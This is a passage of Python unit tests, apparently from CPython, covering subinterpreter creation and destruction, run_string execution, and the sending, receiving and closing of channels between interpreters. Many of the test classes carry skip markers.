def test_str(self):
id = interpreters.InterpreterID(10, force=True)
self.assertEqual(str(id), '10')
def test_repr(self):
id = interpreters.InterpreterID(10, force=True)
self.assertEqual(repr(id), 'InterpreterID(10)')
def test_equality(self):
id1 = interpreters.create()
id2 = interpreters.InterpreterID(int(id1))
id3 = interpreters.create()
self.assertTrue(id1 == id1)
self.assertTrue(id1 == id2)
self.assertTrue(id1 == int(id1))
self.assertTrue(int(id1) == id1)
self.assertTrue(id1 == float(int(id1)))
self.assertTrue(float(int(id1)) == id1)
self.assertFalse(id1 == float(int(id1)) + 0.1)
self.assertFalse(id1 == str(int(id1)))
self.assertFalse(id1 == 2**1000)
self.assertFalse(id1 == float('inf'))
self.assertFalse(id1 == 'spam')
self.assertFalse(id1 == id3)
self.assertFalse(id1 != id1)
self.assertFalse(id1 != id2)
self.assertTrue(id1 != id3)
@unittest.skip("sgross: skip subinterpreter tests")
class CreateTests(TestBase):
def test_in_main(self):
id = interpreters.create()
self.assertIsInstance(id, interpreters.InterpreterID)
self.assertIn(id, interpreters.list_all())
@unittest.skip('enable this test when working on pystate.c')
def test_unique_id(self):
seen = set()
for _ in range(100):
id = interpreters.create()
interpreters.destroy(id)
seen.add(id)
self.assertEqual(len(seen), 100)
@unittest.skip("sgross: this tests swaps in a PyThreadState from a different thread")
def test_in_thread(self):
lock = threading.Lock()
id = None
def f():
nonlocal id
id = interpreters.create()
lock.acquire()
lock.release()
t = threading.Thread(target=f)
with lock:
t.start()
t.join()
self.assertIn(id, interpreters.list_all())
def test_in_subinterpreter(self):
main, = interpreters.list_all()
id1 = interpreters.create()
out = _run_output(id1, dedent("""
import _xxsubinterpreters as _interpreters
id = _interpreters.create()
print(id)
assert isinstance(id, _interpreters.InterpreterID)
"""))
id2 = int(out.strip())
self.assertEqual(set(interpreters.list_all()), {main, id1, id2})
@unittest.skip("sgross: this tests swaps in a PyThreadState from a different thread")
def test_in_threaded_subinterpreter(self):
main, = interpreters.list_all()
id1 = interpreters.create()
id2 = None
def f():
nonlocal id2
out = _run_output(id1, dedent("""
import _xxsubinterpreters as _interpreters
id = _interpreters.create()
print(id)
"""))
id2 = int(out.strip())
t = threading.Thread(target=f)
t.start()
t.join()
self.assertEqual(set(interpreters.list_all()), {main, id1, id2})
def test_after_destroy_all(self):
before = set(interpreters.list_all())
# Create 3 subinterpreters.
ids = []
for _ in range(3):
id = interpreters.create()
ids.append(id)
# Now destroy them.
for id in ids:
interpreters.destroy(id)
# Finally, create another.
id = interpreters.create()
self.assertEqual(set(interpreters.list_all()), before | {id})
def test_after_destroy_some(self):
before = set(interpreters.list_all())
# Create 3 subinterpreters.
id1 = interpreters.create()
id2 = interpreters.create()
id3 = interpreters.create()
# Now destroy 2 of them.
interpreters.destroy(id1)
interpreters.destroy(id3)
# Finally, create another.
id = interpreters.create()
self.assertEqual(set(interpreters.list_all()), before | {id, id2})
@unittest.skip("sgross: skip subinterpreter tests")
class DestroyTests(TestBase):
def test_one(self):
id1 = interpreters.create()
id2 = interpreters.create()
id3 = interpreters.create()
self.assertIn(id2, interpreters.list_all())
interpreters.destroy(id2)
self.assertNotIn(id2, interpreters.list_all())
self.assertIn(id1, interpreters.list_all())
self.assertIn(id3, interpreters.list_all())
def test_all(self):
before = set(interpreters.list_all())
ids = set()
for _ in range(3):
id = interpreters.create()
ids.add(id)
self.assertEqual(set(interpreters.list_all()), before | ids)
for id in ids:
interpreters.destroy(id)
self.assertEqual(set(interpreters.list_all()), before)
def test_main(self):
main, = interpreters.list_all()
with self.assertRaises(RuntimeError):
interpreters.destroy(main)
def f():
with self.assertRaises(RuntimeError):
interpreters.destroy(main)
t = threading.Thread(target=f)
t.start()
t.join()
def test_already_destroyed(self):
id = interpreters.create()
interpreters.destroy(id)
with self.assertRaises(RuntimeError):
interpreters.destroy(id)
def test_does_not_exist(self):
with self.assertRaises(RuntimeError):
interpreters.destroy(1_000_000)
def test_bad_id(self):
with self.assertRaises(ValueError):
interpreters.destroy(-1)
def test_from_current(self):
main, = interpreters.list_all()
id = interpreters.create()
script = dedent(f"""
import _xxsubinterpreters as _interpreters
try:
_interpreters.destroy({id})
except RuntimeError:
pass
""")
interpreters.run_string(id, script)
self.assertEqual(set(interpreters.list_all()), {main, id})
def test_from_sibling(self):
main, = interpreters.list_all()
id1 = interpreters.create()
id2 = interpreters.create()
script = dedent(f"""
import _xxsubinterpreters as _interpreters
_interpreters.destroy({id2})
""")
interpreters.run_string(id1, script)
self.assertEqual(set(interpreters.list_all()), {main, id1})
@unittest.skip("sgross: this tests swaps in a PyThreadState from a different thread")
def test_from_other_thread(self):
id = interpreters.create()
def f():
interpreters.destroy(id)
t = threading.Thread(target=f)
t.start()
t.join()
@unittest.skip("sgross: this tests swaps in a PyThreadState from a different thread")
def test_still_running(self):
main, = interpreters.list_all()
interp = interpreters.create()
with _running(interp):
self.assertTrue(interpreters.is_running(interp),
msg=f"Interp {interp} should be running before destruction.")
with self.assertRaises(RuntimeError,
msg=f"Should not be able to destroy interp {interp} while it's still running."):
interpreters.destroy(interp)
self.assertTrue(interpreters.is_running(interp))
@unittest.skip("sgross: skip subinterpreter tests")
class RunStringTests(TestBase):
SCRIPT = dedent("""
with open('{}', 'w') as out:
out.write('{}')
""")
FILENAME = 'spam'
def setUp(self):
super().setUp()
self.id = interpreters.create()
self._fs = None
def tearDown(self):
if self._fs is not None:
self._fs.close()
super().tearDown()
def test_success(self):
script, file = _captured_script('print("it worked!", end="")')
with file:
interpreters.run_string(self.id, script)
out = file.read()
self.assertEqual(out, 'it worked!')
@unittest.skip("sgross: this tests swaps in a PyThreadState from a different thread")
def test_in_thread(self):
script, file = _captured_script('print("it worked!", end="")')
with file:
def f():
interpreters.run_string(self.id, script)
t = threading.Thread(target=f)
t.start()
t.join()
out = file.read()
self.assertEqual(out, 'it worked!')
def test_create_thread(self):
subinterp = interpreters.create(isolated=False)
script, file = _captured_script("""
import threading
def f():
print('it worked!', end='')
t = threading.Thread(target=f)
t.start()
t.join()
""")
with file:
interpreters.run_string(subinterp, script)
out = file.read()
self.assertEqual(out, 'it worked!')
@unittest.skipUnless(hasattr(os, 'fork'), "test needs os.fork()")
def test_fork(self):
import tempfile
with tempfile.NamedTemporaryFile('w+') as file:
file.write('')
file.flush()
expected = 'spam spam spam spam spam'
script = dedent(f"""
import os
try:
os.fork()
except RuntimeError:
with open('{file.name}', 'w') as out:
out.write('{expected}')
""")
interpreters.run_string(self.id, script)
file.seek(0)
content = file.read()
self.assertEqual(content, expected)
@unittest.skip("sgross: this tests swaps in a PyThreadState from a different thread")
def test_already_running(self):
with _running(self.id):
with self.assertRaises(RuntimeError):
interpreters.run_string(self.id, 'print("spam")')
def test_does_not_exist(self):
id = 0
while id in interpreters.list_all():
id += 1
with self.assertRaises(RuntimeError):
interpreters.run_string(id, 'print("spam")')
def test_error_id(self):
with self.assertRaises(ValueError):
interpreters.run_string(-1, 'print("spam")')
def test_bad_id(self):
with self.assertRaises(TypeError):
interpreters.run_string('spam', 'print("spam")')
def test_bad_script(self):
with self.assertRaises(TypeError):
interpreters.run_string(self.id, 10)
def test_bytes_for_script(self):
with self.assertRaises(TypeError):
interpreters.run_string(self.id, b'print("spam")')
@contextlib.contextmanager
def assert_run_failed(self, exctype, msg=None):
with self.assertRaises(interpreters.RunFailedError) as caught:
yield
if msg is None:
self.assertEqual(str(caught.exception).split(':')[0],
str(exctype))
else:
self.assertEqual(str(caught.exception),
"{}: {}".format(exctype, msg))
def test_invalid_syntax(self):
with self.assert_run_failed(SyntaxError):
# missing close paren
interpreters.run_string(self.id, 'print("spam"')
def test_failure(self):
with self.assert_run_failed(Exception, 'spam'):
interpreters.run_string(self.id, 'raise Exception("spam")')
def test_SystemExit(self):
with self.assert_run_failed(SystemExit, '42'):
interpreters.run_string(self.id, 'raise SystemExit(42)')
def test_sys_exit(self):
with self.assert_run_failed(SystemExit):
interpreters.run_string(self.id, dedent("""
import sys
sys.exit()
"""))
with self.assert_run_failed(SystemExit, '42'):
interpreters.run_string(self.id, dedent("""
import sys
sys.exit(42)
"""))
def test_with_shared(self):
r, w = os.pipe()
shared = {
'spam': b'ham',
'eggs': b'-1',
'cheddar': None,
}
script = dedent(f"""
eggs = int(eggs)
spam = 42
result = spam + eggs
ns = dict(vars())
del ns['__builtins__']
import pickle
with open({w}, 'wb') as chan:
pickle.dump(ns, chan)
""")
interpreters.run_string(self.id, script, shared)
with open(r, 'rb') as chan:
ns = pickle.load(chan)
self.assertEqual(ns['spam'], 42)
self.assertEqual(ns['eggs'], -1)
self.assertEqual(ns['result'], 41)
self.assertIsNone(ns['cheddar'])
def test_shared_overwrites(self):
interpreters.run_string(self.id, dedent("""
spam = 'eggs'
ns1 = dict(vars())
del ns1['__builtins__']
"""))
shared = {'spam': b'ham'}
script = dedent(f"""
ns2 = dict(vars())
del ns2['__builtins__']
""")
interpreters.run_string(self.id, script, shared)
r, w = os.pipe()
script = dedent(f"""
ns = dict(vars())
del ns['__builtins__']
import pickle
with open({w}, 'wb') as chan:
pickle.dump(ns, chan)
""")
interpreters.run_string(self.id, script)
with open(r, 'rb') as chan:
ns = pickle.load(chan)
self.assertEqual(ns['ns1']['spam'], 'eggs')
self.assertEqual(ns['ns2']['spam'], b'ham')
self.assertEqual(ns['spam'], b'ham')
def test_shared_overwrites_default_vars(self):
r, w = os.pipe()
shared = {'__name__': b'not __main__'}
script = dedent(f"""
spam = 42
ns = dict(vars())
del ns['__builtins__']
import pickle
with open({w}, 'wb') as chan:
pickle.dump(ns, chan)
""")
interpreters.run_string(self.id, script, shared)
with open(r, 'rb') as chan:
ns = pickle.load(chan)
self.assertEqual(ns['__name__'], b'not __main__')
def test_main_reused(self):
r, w = os.pipe()
interpreters.run_string(self.id, dedent(f"""
spam = True
ns = dict(vars())
del ns['__builtins__']
import pickle
with open({w}, 'wb') as chan:
pickle.dump(ns, chan)
del ns, pickle, chan
"""))
with open(r, 'rb') as chan:
ns1 = pickle.load(chan)
r, w = os.pipe()
interpreters.run_string(self.id, dedent(f"""
eggs = False
ns = dict(vars())
del ns['__builtins__']
import pickle
with open({w}, 'wb') as chan:
pickle.dump(ns, chan)
"""))
with open(r, 'rb') as chan:
ns2 = pickle.load(chan)
self.assertIn('spam', ns1)
self.assertNotIn('eggs', ns1)
self.assertIn('eggs', ns2)
self.assertIn('spam', ns2)
def test_execution_namespace_is_main(self):
r, w = os.pipe()
script = dedent(f"""
spam = 42
ns = dict(vars())
ns['__builtins__'] = str(ns['__builtins__'])
import pickle
with open({w}, 'wb') as chan:
pickle.dump(ns, chan)
""")
interpreters.run_string(self.id, script)
with open(r, 'rb') as chan:
ns = pickle.load(chan)
ns.pop('__builtins__')
ns.pop('__loader__')
self.assertEqual(ns, {
'__name__': '__main__',
'__annotations__': {},
'__doc__': None,
'__package__': None,
'__spec__': None,
'spam': 42,
})
# XXX Fix this test!
@unittest.skip('blocking forever')
def test_still_running_at_exit(self):
script = dedent(f"""
from textwrap import dedent
import threading
import _xxsubinterpreters as _interpreters
id = _interpreters.create()
def f():
_interpreters.run_string(id, dedent('''
import time
# Give plenty of time for the main interpreter to finish.
time.sleep(1_000_000)
'''))
t = threading.Thread(target=f)
t.start()
""")
with support.temp_dir() as dirname:
filename = script_helper.make_script(dirname, 'interp', script)
with script_helper.spawn_python(filename) as proc:
retcode = proc.wait()
self.assertEqual(retcode, 0)
##################################
# channel tests
@unittest.skip("sgross: skip subinterpreter tests")
class ChannelIDTests(TestBase):
def test_default_kwargs(self):
cid = interpreters._channel_id(10, force=True)
self.assertEqual(int(cid), 10)
self.assertEqual(cid.end, 'both')
def test_with_kwargs(self):
cid = interpreters._channel_id(10, send=True, force=True)
self.assertEqual(cid.end, 'send')
cid = interpreters._channel_id(10, send=True, recv=False, force=True)
self.assertEqual(cid.end, 'send')
cid = interpreters._channel_id(10, recv=True, force=True)
self.assertEqual(cid.end, 'recv')
cid = interpreters._channel_id(10, recv=True, send=False, force=True)
self.assertEqual(cid.end, 'recv')
cid = interpreters._channel_id(10, send=True, recv=True, force=True)
self.assertEqual(cid.end, 'both')
def test_coerce_id(self):
class Int(str):
def __index__(self):
return 10
cid = interpreters._channel_id(Int(), force=True)
self.assertEqual(int(cid), 10)
def test_bad_id(self):
self.assertRaises(TypeError, interpreters._channel_id, object())
self.assertRaises(TypeError, interpreters._channel_id, 10.0)
self.assertRaises(TypeError, interpreters._channel_id, '10')
self.assertRaises(TypeError, interpreters._channel_id, b'10')
self.assertRaises(ValueError, interpreters._channel_id, -1)
self.assertRaises(OverflowError, interpreters._channel_id, 2**64)
def test_bad_kwargs(self):
with self.assertRaises(ValueError):
interpreters._channel_id(10, send=False, recv=False)
def test_does_not_exist(self):
cid = interpreters.channel_create()
with self.assertRaises(interpreters.ChannelNotFoundError):
interpreters._channel_id(int(cid) + 1) # unforced
def test_str(self):
cid = interpreters._channel_id(10, force=True)
self.assertEqual(str(cid), '10')
def test_repr(self):
cid = interpreters._channel_id(10, force=True)
self.assertEqual(repr(cid), 'ChannelID(10)')
cid = interpreters._channel_id(10, send=True, force=True)
self.assertEqual(repr(cid), 'ChannelID(10, send=True)')
cid = interpreters._channel_id(10, recv=True, force=True)
self.assertEqual(repr(cid), 'ChannelID(10, recv=True)')
cid = interpreters._channel_id(10, send=True, recv=True, force=True)
self.assertEqual(repr(cid), 'ChannelID(10)')
def test_equality(self):
cid1 = interpreters.channel_create()
cid2 = interpreters._channel_id(int(cid1))
cid3 = interpreters.channel_create()
self.assertTrue(cid1 == cid1)
self.assertTrue(cid1 == cid2)
self.assertTrue(cid1 == int(cid1))
self.assertTrue(int(cid1) == cid1)
self.assertTrue(cid1 == float(int(cid1)))
self.assertTrue(float(int(cid1)) == cid1)
self.assertFalse(cid1 == float(int(cid1)) + 0.1)
self.assertFalse(cid1 == str(int(cid1)))
self.assertFalse(cid1 == 2**1000)
self.assertFalse(cid1 == float('inf'))
self.assertFalse(cid1 == 'spam')
self.assertFalse(cid1 == cid3)
self.assertFalse(cid1 != cid1)
self.assertFalse(cid1 != cid2)
self.assertTrue(cid1 != cid3)
@unittest.skip("sgross: skip subinterpreter tests")
class ChannelTests(TestBase):
def test_create_cid(self):
cid = interpreters.channel_create()
self.assertIsInstance(cid, interpreters.ChannelID)
def test_sequential_ids(self):
before = interpreters.channel_list_all()
id1 = interpreters.channel_create()
id2 = interpreters.channel_create()
id3 = interpreters.channel_create()
after = interpreters.channel_list_all()
self.assertEqual(id2, int(id1) + 1)
self.assertEqual(id3, int(id2) + 1)
self.assertEqual(set(after) - set(before), {id1, id2, id3})
def test_ids_global(self):
id1 = interpreters.create()
out = _run_output(id1, dedent("""
import _xxsubinterpreters as _interpreters
cid = _interpreters.channel_create()
print(cid)
"""))
cid1 = int(out.strip())
id2 = interpreters.create()
out = _run_output(id2, dedent("""
import _xxsubinterpreters as _interpreters
cid = _interpreters.channel_create()
print(cid)
"""))
cid2 = int(out.strip())
self.assertEqual(cid2, int(cid1) + 1)
def test_channel_list_interpreters_none(self):
"""Test listing interpreters for a channel with no associations."""
# Test for channel with no associated interpreters.
cid = interpreters.channel_create()
send_interps = interpreters.channel_list_interpreters(cid, send=True)
recv_interps = interpreters.channel_list_interpreters(cid, send=False)
self.assertEqual(send_interps, [])
self.assertEqual(recv_interps, [])
def test_channel_list_interpreters_basic(self):
"""Test basic listing channel interpreters."""
interp0 = interpreters.get_main()
cid = interpreters.channel_create()
interpreters.channel_send(cid, "send")
# Test for a channel that has one end associated to an interpreter.
send_interps = interpreters.channel_list_interpreters(cid, send=True)
recv_interps = interpreters.channel_list_interpreters(cid, send=False)
self.assertEqual(send_interps, [interp0])
self.assertEqual(recv_interps, [])
interp1 = interpreters.create()
_run_output(interp1, dedent(f"""
import _xxsubinterpreters as _interpreters
obj = _interpreters.channel_recv({cid})
"""))
# Test for channel that has both ends associated to an interpreter.
send_interps = interpreters.channel_list_interpreters(cid, send=True)
recv_interps = interpreters.channel_list_interpreters(cid, send=False)
self.assertEqual(send_interps, [interp0])
self.assertEqual(recv_interps, [interp1])
def test_channel_list_interpreters_multiple(self):
"""Test listing interpreters for a channel with many associations."""
interp0 = interpreters.get_main()
interp1 = interpreters.create()
interp2 = interpreters.create()
interp3 = interpreters.create()
cid = interpreters.channel_create()
interpreters.channel_send(cid, "send")
_run_output(interp1, dedent(f"""
import _xxsubinterpreters as _interpreters
_interpreters.channel_send({cid}, "send")
"""))
_run_output(interp2, dedent(f"""
import _xxsubinterpreters as _interpreters
obj = _interpreters.channel_recv({cid})
"""))
_run_output(interp3, dedent(f"""
import _xxsubinterpreters as _interpreters
obj = _interpreters.channel_recv({cid})
"""))
send_interps = interpreters.channel_list_interpreters(cid, send=True)
recv_interps = interpreters.channel_list_interpreters(cid, send=False)
self.assertEqual(set(send_interps), {interp0, interp1})
self.assertEqual(set(recv_interps), {interp2, interp3})
def test_channel_list_interpreters_destroyed(self):
"""Test listing channel interpreters with a destroyed interpreter."""
interp0 = interpreters.get_main()
interp1 = interpreters.create()
cid = interpreters.channel_create()
interpreters.channel_send(cid, "send")
_run_output(interp1, dedent(f"""
import _xxsubinterpreters as _interpreters
obj = _interpreters.channel_recv({cid})
"""))
# Should be one interpreter associated with each end.
send_interps = interpreters.channel_list_interpreters(cid, send=True)
recv_interps = interpreters.channel_list_interpreters(cid, send=False)
self.assertEqual(send_interps, [interp0])
self.assertEqual(recv_interps, [interp1])
interpreters.destroy(interp1)
# Destroyed interpreter should not be listed.
send_interps = interpreters.channel_list_interpreters(cid, send=True)
recv_interps = interpreters.channel_list_interpreters(cid, send=False)
self.assertEqual(send_interps, [interp0])
self.assertEqual(recv_interps, [])
def test_channel_list_interpreters_released(self):
"""Test listing channel interpreters with a released channel."""
# Set up one channel with main interpreter on the send end and two
# subinterpreters on the receive end.
interp0 = interpreters.get_main()
interp1 = interpreters.create()
interp2 = interpreters.create()
cid = interpreters.channel_create()
interpreters.channel_send(cid, "data")
_run_output(interp1, dedent(f"""
import _xxsubinterpreters as _interpreters
obj = _interpreters.channel_recv({cid})
"""))
interpreters.channel_send(cid, "data")
_run_output(interp2, dedent(f"""
import _xxsubinterpreters as _interpreters
obj = _interpreters.channel_recv({cid})
"""))
# Check the setup.
send_interps = interpreters.channel_list_interpreters(cid, send=True)
recv_interps = interpreters.channel_list_interpreters(cid, send=False)
self.assertEqual(len(send_interps), 1)
self.assertEqual(len(recv_interps), 2)
# Release the main interpreter from the send end.
interpreters.channel_release(cid, send=True)
# Send end should have no associated interpreters.
send_interps = interpreters.channel_list_interpreters(cid, send=True)
recv_interps = interpreters.channel_list_interpreters(cid, send=False)
self.assertEqual(len(send_interps), 0)
self.assertEqual(len(recv_interps), 2)
# Release one of the subinterpreters from the receive end.
_run_output(interp2, dedent(f"""
import _xxsubinterpreters as _interpreters
_interpreters.channel_release({cid})
"""))
# Receive end should have the released interpreter removed.
send_interps = interpreters.channel_list_interpreters(cid, send=True)
recv_interps = interpreters.channel_list_interpreters(cid, send=False)
self.assertEqual(len(send_interps), 0)
self.assertEqual(recv_interps, [interp1])
def test_channel_list_interpreters_closed(self):
"""Test listing channel interpreters with a closed channel."""
interp0 = interpreters.get_main()
interp1 = interpreters.create()
cid = interpreters.channel_create()
# Put something in the channel so that it's not empty.
interpreters.channel_send(cid, "send")
# Check initial state.
send_interps = interpreters.channel_list_interpreters(cid, send=True)
recv_interps = interpreters.channel_list_interpreters(cid, send=False)
self.assertEqual(len(send_interps), 1)
self.assertEqual(len(recv_interps), 0)
# Force close the channel.
interpreters.channel_close(cid, force=True)
# Both ends should raise an error.
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_list_interpreters(cid, send=True)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_list_interpreters(cid, send=False)
def test_channel_list_interpreters_closed_send_end(self):
"""Test listing channel interpreters with a channel's send end closed."""
interp0 = interpreters.get_main()
interp1 = interpreters.create()
cid = interpreters.channel_create()
# Put something in the channel so that it's not empty.
interpreters.channel_send(cid, "send")
# Check initial state.
send_interps = interpreters.channel_list_interpreters(cid, send=True)
recv_interps = interpreters.channel_list_interpreters(cid, send=False)
self.assertEqual(len(send_interps), 1)
self.assertEqual(len(recv_interps), 0)
# Close the send end of the channel.
interpreters.channel_close(cid, send=True)
# Send end should raise an error.
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_list_interpreters(cid, send=True)
# Receive end should not be closed (since channel is not empty).
recv_interps = interpreters.channel_list_interpreters(cid, send=False)
self.assertEqual(len(recv_interps), 0)
# Close the receive end of the channel from a subinterpreter.
_run_output(interp1, dedent(f"""
import _xxsubinterpreters as _interpreters
_interpreters.channel_close({cid}, force=True)
"""))
# Both ends should raise an error.
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_list_interpreters(cid, send=True)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_list_interpreters(cid, send=False)
####################
def test_send_recv_main(self):
cid = interpreters.channel_create()
orig = b'spam'
interpreters.channel_send(cid, orig)
obj = interpreters.channel_recv(cid)
self.assertEqual(obj, orig)
self.assertIsNot(obj, orig)
def test_send_recv_same_interpreter(self):
id1 = interpreters.create()
out = _run_output(id1, dedent("""
import _xxsubinterpreters as _interpreters
cid = _interpreters.channel_create()
orig = b'spam'
_interpreters.channel_send(cid, orig)
obj = _interpreters.channel_recv(cid)
assert obj is not orig
assert obj == orig
"""))
def test_send_recv_different_interpreters(self):
cid = interpreters.channel_create()
id1 = interpreters.create()
out = _run_output(id1, dedent(f"""
import _xxsubinterpreters as _interpreters
_interpreters.channel_send({cid}, b'spam')
"""))
obj = interpreters.channel_recv(cid)
self.assertEqual(obj, b'spam')
@unittest.skip("sgross: this tests swaps in a PyThreadState from a different thread")
def test_send_recv_different_threads(self):
cid = interpreters.channel_create()
def f():
while True:
try:
obj = interpreters.channel_recv(cid)
break
except interpreters.ChannelEmptyError:
time.sleep(0.1)
interpreters.channel_send(cid, obj)
t = threading.Thread(target=f)
t.start()
interpreters.channel_send(cid, b'spam')
t.join()
obj = interpreters.channel_recv(cid)
self.assertEqual(obj, b'spam')
@unittest.skip("sgross: this tests swaps in a PyThreadState from a different thread")
def test_send_recv_different_interpreters_and_threads(self):
cid = interpreters.channel_create()
id1 = interpreters.create()
out = None
def f():
nonlocal out
out = _run_output(id1, dedent(f"""
import time
import _xxsubinterpreters as _interpreters
while True:
try:
obj = _interpreters.channel_recv({cid})
break
except _interpreters.ChannelEmptyError:
time.sleep(0.1)
assert(obj == b'spam')
_interpreters.channel_send({cid}, b'eggs')
"""))
t = threading.Thread(target=f)
t.start()
interpreters.channel_send(cid, b'spam')
t.join()
obj = interpreters.channel_recv(cid)
self.assertEqual(obj, b'eggs')
def test_send_not_found(self):
with self.assertRaises(interpreters.ChannelNotFoundError):
interpreters.channel_send(10, b'spam')
def test_recv_not_found(self):
with self.assertRaises(interpreters.ChannelNotFoundError):
interpreters.channel_recv(10)
def test_recv_empty(self):
cid = interpreters.channel_create()
with self.assertRaises(interpreters.ChannelEmptyError):
interpreters.channel_recv(cid)
def test_recv_default(self):
default = object()
cid = interpreters.channel_create()
obj1 = interpreters.channel_recv(cid, default)
interpreters.channel_send(cid, None)
interpreters.channel_send(cid, 1)
interpreters.channel_send(cid, b'spam')
interpreters.channel_send(cid, b'eggs')
obj2 = interpreters.channel_recv(cid, default)
obj3 = interpreters.channel_recv(cid, default)
obj4 = interpreters.channel_recv(cid)
obj5 = interpreters.channel_recv(cid, default)
obj6 = interpreters.channel_recv(cid, default)
self.assertIs(obj1, default)
self.assertIs(obj2, None)
self.assertEqual(obj3, 1)
self.assertEqual(obj4, b'spam')
self.assertEqual(obj5, b'eggs')
self.assertIs(obj6, default)
def test_run_string_arg_unresolved(self):
cid = interpreters.channel_create()
interp = interpreters.create()
out = _run_output(interp, dedent("""
import _xxsubinterpreters as _interpreters
print(cid.end)
_interpreters.channel_send(cid, b'spam')
"""),
dict(cid=cid.send))
obj = interpreters.channel_recv(cid)
self.assertEqual(obj, b'spam')
self.assertEqual(out.strip(), 'send')
# XXX For now there is no high-level channel into which the
# sent channel ID can be converted...
# Note: this test caused crashes on some buildbots (bpo-33615).
@unittest.skip('disabled until high-level channels exist')
def test_run_string_arg_resolved(self):
cid = interpreters.channel_create()
cid = interpreters._channel_id(cid, _resolve=True)
interp = interpreters.create()
out = _run_output(interp, dedent("""
import _xxsubinterpreters as _interpreters
print(chan.id.end)
_interpreters.channel_send(chan.id, b'spam')
"""),
dict(chan=cid.send))
obj = interpreters.channel_recv(cid)
self.assertEqual(obj, b'spam')
self.assertEqual(out.strip(), 'send')
# close
def test_close_single_user(self):
cid = interpreters.channel_create()
interpreters.channel_send(cid, b'spam')
interpreters.channel_recv(cid)
interpreters.channel_close(cid)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_send(cid, b'eggs')
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_recv(cid)
def test_close_multiple_users(self):
cid = interpreters.channel_create()
id1 = interpreters.create()
id2 = interpreters.create()
interpreters.run_string(id1, dedent(f"""
import _xxsubinterpreters as _interpreters
_interpreters.channel_send({cid}, b'spam')
"""))
interpreters.run_string(id2, dedent(f"""
import _xxsubinterpreters as _interpreters
_interpreters.channel_recv({cid})
"""))
interpreters.channel_close(cid)
with self.assertRaises(interpreters.RunFailedError) as cm:
interpreters.run_string(id1, dedent(f"""
_interpreters.channel_send({cid}, b'spam')
"""))
self.assertIn('ChannelClosedError', str(cm.exception))
with self.assertRaises(interpreters.RunFailedError) as cm:
interpreters.run_string(id2, dedent(f"""
_interpreters.channel_send({cid}, b'spam')
"""))
self.assertIn('ChannelClosedError', str(cm.exception))
def test_close_multiple_times(self):
cid = interpreters.channel_create()
interpreters.channel_send(cid, b'spam')
interpreters.channel_recv(cid)
interpreters.channel_close(cid)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_close(cid)
def test_close_empty(self):
tests = [
(False, False),
(True, False),
(False, True),
(True, True),
]
for send, recv in tests:
with self.subTest((send, recv)):
cid = interpreters.channel_create()
interpreters.channel_send(cid, b'spam')
interpreters.channel_recv(cid)
interpreters.channel_close(cid, send=send, recv=recv)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_send(cid, b'eggs')
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_recv(cid)
def test_close_defaults_with_unused_items(self):
cid = interpreters.channel_create()
interpreters.channel_send(cid, b'spam')
interpreters.channel_send(cid, b'ham')
with self.assertRaises(interpreters.ChannelNotEmptyError):
interpreters.channel_close(cid)
interpreters.channel_recv(cid)
interpreters.channel_send(cid, b'eggs')
def test_close_recv_with_unused_items_unforced(self):
cid = interpreters.channel_create()
interpreters.channel_send(cid, b'spam')
interpreters.channel_send(cid, b'ham')
with self.assertRaises(interpreters.ChannelNotEmptyError):
interpreters.channel_close(cid, recv=True)
interpreters.channel_recv(cid)
interpreters.channel_send(cid, b'eggs')
interpreters.channel_recv(cid)
interpreters.channel_recv(cid)
interpreters.channel_close(cid, recv=True)
def test_close_send_with_unused_items_unforced(self):
cid = interpreters.channel_create()
interpreters.channel_send(cid, b'spam')
interpreters.channel_send(cid, b'ham')
interpreters.channel_close(cid, send=True)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_send(cid, b'eggs')
interpreters.channel_recv(cid)
interpreters.channel_recv(cid)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_recv(cid)
def test_close_both_with_unused_items_unforced(self):
cid = interpreters.channel_create()
interpreters.channel_send(cid, b'spam')
interpreters.channel_send(cid, b'ham')
with self.assertRaises(interpreters.ChannelNotEmptyError):
interpreters.channel_close(cid, recv=True, send=True)
interpreters.channel_recv(cid)
interpreters.channel_send(cid, b'eggs')
interpreters.channel_recv(cid)
interpreters.channel_recv(cid)
interpreters.channel_close(cid, recv=True)
def test_close_recv_with_unused_items_forced(self):
cid = interpreters.channel_create()
interpreters.channel_send(cid, b'spam')
interpreters.channel_send(cid, b'ham')
interpreters.channel_close(cid, recv=True, force=True)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_send(cid, b'eggs')
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_recv(cid)
def test_close_send_with_unused_items_forced(self):
cid = interpreters.channel_create()
interpreters.channel_send(cid, b'spam')
interpreters.channel_send(cid, b'ham')
interpreters.channel_close(cid, send=True, force=True)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_send(cid, b'eggs')
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_recv(cid)
def test_close_both_with_unused_items_forced(self):
cid = interpreters.channel_create()
interpreters.channel_send(cid, b'spam')
interpreters.channel_send(cid, b'ham')
interpreters.channel_close(cid, send=True, recv=True, force=True)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_send(cid, b'eggs')
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_recv(cid)
def test_close_never_used(self):
cid = interpreters.channel_create()
interpreters.channel_close(cid)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_send(cid, b'spam')
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_recv(cid)
def test_close_by_unassociated_interp(self):
cid = interpreters.channel_create()
interpreters.channel_send(cid, b'spam')
interp = interpreters.create()
interpreters.run_string(interp, dedent(f"""
import _xxsubinterpreters as _interpreters
_interpreters.channel_close({cid}, force=True)
"""))
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_recv(cid)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_close(cid)
def test_close_used_multiple_times_by_single_user(self):
cid = interpreters.channel_create()
interpreters.channel_send(cid, b'spam')
interpreters.channel_send(cid, b'spam')
